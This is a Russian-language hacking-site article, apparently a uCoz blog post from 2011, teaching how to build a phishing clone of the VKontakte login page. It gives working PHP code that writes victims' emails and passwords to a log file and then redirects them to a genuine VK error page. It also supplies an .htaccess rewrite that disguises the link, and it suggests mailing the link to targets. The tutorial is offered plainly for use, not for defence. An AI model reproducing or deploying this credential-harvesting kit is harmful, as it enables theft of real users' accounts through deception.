Прибыль каждые 10 минут!
ComputerF1
Главная
Вход
Регистрация
Четверг, 09.07.2020, 04:15Приветствую Вас Гость | RSS
Меню сайта

Категории раздела
Операционные системы Windows [30]
Windows термины [11]
Термины значений
Помощь вашему компьютеру [11]
В этой категории находятся статьи, помогающие устранить неисправности вашего компьютера.
Компьютерные сети [3]
Всё о компьютерных сетях
Флешка [5]
Все о флешках
Железо [17]
Мониторы, материнские платы, процессоры, жесткие диски, блоки питания .....
Интернет [12]
Всё о интернет, безопасная работа в интернете
Хакер [7]
Хакерские статьи
Компьютерные вирусы [13]
Виды вирусов
Офисные АТС [0]
BIOS [22]
Всё о BIOS

Мини-чат

Наш опрос
Оцените мой сайт
Всего ответов: 512

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

Главная » Статьи » Хакер

Делаем фейк на примере Vkontakte.

Делаем свой фейк

Итак, первое что нам нужно, так это выбрать жертворесурс и собрать всю нужную нам инфу,а нам нужна толька копия некоторых страниц.Идем на vkontakte.ru через Operu (!). Жмём кнопочку вход, попадаем на login.php, ее и возьмем за индекс нашего фейка. Жмем в опере: Фаил-->Сохранить как-->В открывшимся диалоге под названием выбираем (по умолчанию там стоит Веб Архив....) "HTML Фаил с изображениями", и обезательно графу Имя Файла пишем index(или login.htm - в зависимости от страницы)


Далее вводим туда нереальные данные и попадаем на страницу, на которой написано

 

Сохраняем ее точно так же, только вместо index пишем bad.

 

Далее вбиваем в Google.ru фразу Vkontakte.ru, жмем Дополнительные результаты с vkontakte.ru » и ищим что-то связанное с эрором контакта... На вторйо страницы я нашел VKontakte | Error (http://vkontakte.ru/blank.php?code=10)- запоминаем,нам понадобиться эта ссылка

 

Усе, все что нам надо для фейка от ресурса, у нас уже есть.

 

[CoDiNg]

 

Такс, теперь иследуем форму логина. Открываем наш index.html и ищем форму входа.

 

Код:

 

<form method="post" name="login" id="login" action="login.php">

<input type="hidden" name="success_url" id="success_url" value="">

<input type="hidden" name="fail_url" id="fail_url" value="">

<input type="hidden" name="try_to_login" id="try_to_login" value="1">

<table align="center" cellpadding=0 cellspacing=7 border=0 width="40%">

<tr>

<td width="100px">

<span class="grey">Email:</span>

</td>

<td>

<input class="inputText" type="text" name="email" value="" id="email" size="25" />

<td>

</tr>

<tr>

<td>

<span class="grey">Пароль:</span>

</td>

<td>

<input class="inputText" type="password" name="pass" value="" id="pass" size="25" />

</td>

</tr>

 

<tr>

<td>

&nbsp;

</td>

<td>

<input style="margin-top:1px; vertical-align: middle;" type="checkbox" name="expire" id="expire" value="1" /><small>Чужой компьютер</small>

</td>

</tr>

<tr>

<td>

&nbsp;

</td>

<td>

 

Отсюда запоминаем 3 вещи:

1)

Код:

 

<form method="post" name="login" id="login" action="login.php">

 

2)

Код:

 

<input class="inputText" type="text" name="email" value="" id="email" size="25" />

 

3)

Код:

 

<input class="inputText" type="password" name="pass" value="" id="pass" size="25" />

 

Именно в этих 3 вещах заключаеться первая часть уникальности, на любой социалке или эмайле или еще где либо, везде форма входа(поля), будут в таком види (ну только название полей будит отличаться),к примеру у однокласников это

Код:

 

<input id="field_password" value="" style="width: 170px;" type="password" size="20" name="st.password">

 

Тоесть просто отличаеться название полей, элементами дизайна, но функция у всех одна и таже.

 

Теперь мы создаем php файл, и называем его к примеру login.php, его содержимое:

 

PHP код:

<?php

/*

#############

#by_NoNameZ#

###########

*/

$f=fopen("log.txt","at");

flock($f,2);

if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['password'])){

fputs($f, $_POST['email'].";".$_POST['password']." \n");

header("Location: http://");

} else {

header("Location: http://");

}

flock($f,3);

fclose($f);

?>

Собственно смотрим на скрипт, пару строчег, но это вполне нормальный фейк, его функционал:

Сохранение передаваемых переменных, их проверка, редирект в зависимости от проверки.

 

Итак, теперь возвращаемся к тем 3 строчкам:

1)

Код:

 

<form method="post" name="login" id="login" action="login.php">

 

тут у нас все в порядке, имя нашего скрипта совпадает с именем их, но бывает что и не совпадет, тогда заменяем его или же переименовываем наш.

 

2)

Код:

 

<input class="inputText" type="text" name="email" value="" id="email" size="25" />

 

Код:

 

<input class="inputText" type="password" name="pass" value="" id="pass" size="25" />

 

Отсюда нам нужно name="email" и name="pass"

Вставляем их в наш скрипт в нужное место

 

PHP код:

<?php

/*

#############

#by_NoNameZ#

###########

*/

$f=fopen("log.txt","at");

flock($f,2);

if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['pass'])){

fputs($f, $_POST['email'].";".$_POST['pass']." \n");

header("Location: http://");

} else {

header("Location: http://");

}

flock($f,3);

fclose($f);

?>

Кто не заметил, это $_POST['email'] и $_POST['pass']

 

Далее смотрим скрип, тут стоит функция IF ELSE, и прегматч, то есть если поле эмайл соотвествует эмайлу(ника@мыло.ру, а не как водят ывпмдвгк), и поле пароль не пустое, то выполняется первый редирект, если же эмайл не соответствует или поле пасс пустое, то на второй редирект. Из этого следует,что если челл ввел мыло и что-то похожее на пасс, то кидаем его на страницу с эрором http://vkontakte.ru/blank.php?code=10, а если ввел фигню (вот тут нам и понадобилась копия страницы bad.html?когда мы вводили неверные данные), то кидаем его обратно, тоесть вписываем bad.htm.

 

Выглядит это так:

PHP код:

<?php

/*

#############

#by_NoNameZ#

###########

*/

$f=fopen("log.txt","at");

flock($f,2);

if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['pass'])){

fputs($f, $_POST['email'].";".$_POST['pass']." \n");

header("Location: http://vkontakte.ru/blank.php?code=10");

} else {

header("Location: bad.htm");

}

flock($f,3);

fclose($f);

?>

Сохраняем. Заливаем всю лабуду на сервер(login.php,index.htm+папка с файлами,bad.htm+папка с файлами),создаем фаил log.txt(советую свое уникальное имя придумать. не забудьте в скрипте сменить), ставим на него chmod777.

 

3) небольшой апдейт...

 

Этот апдейт подойдет очень для СИ, в корне на ftp создаем фаил .htaccess со следующим содержанием:

 

Код:

 

RewriteEngine On

RewriteCond %{REQUEST_FILENAME} !-f

RewriteCond %{REQUEST_URI} !index\.htm

RewriteRule (.*) index.htm? [QSA]

 

ВНИМАНИЕ!

 

!index\.htm - на этот фаил ссылается редирект, если же у вас фейк допустим login.html то соответственно вам нужно переиминовать индекс в логин.

 

Такс, данный фаил нам дает ссылку более качественно газлива, а именно:

Ваш фейк.ру/любой текст, тобишь зная ссылку структуру создаваемого фейка, к примеру контакта, мы можем сделать так:

 

и впарить это по мылу)))согласитесь. менее заметен теперь фейк))

Вот и все

Категория: Хакер | Добавил: serg (27.02.2011)
Просмотров: 3651 | Теги: делаем фейк в контакте | Рейтинг: 2.5/2
Всего комментариев: 0
Имя *:
Email *:
Код *:
Вход на сайт

Поиск

Друзья сайта
  • Официальный блог
  • Сообщество uCoz
  • FAQ по системе
  • Инструкции для uCoz


  • Прибыль каждые 10 минут!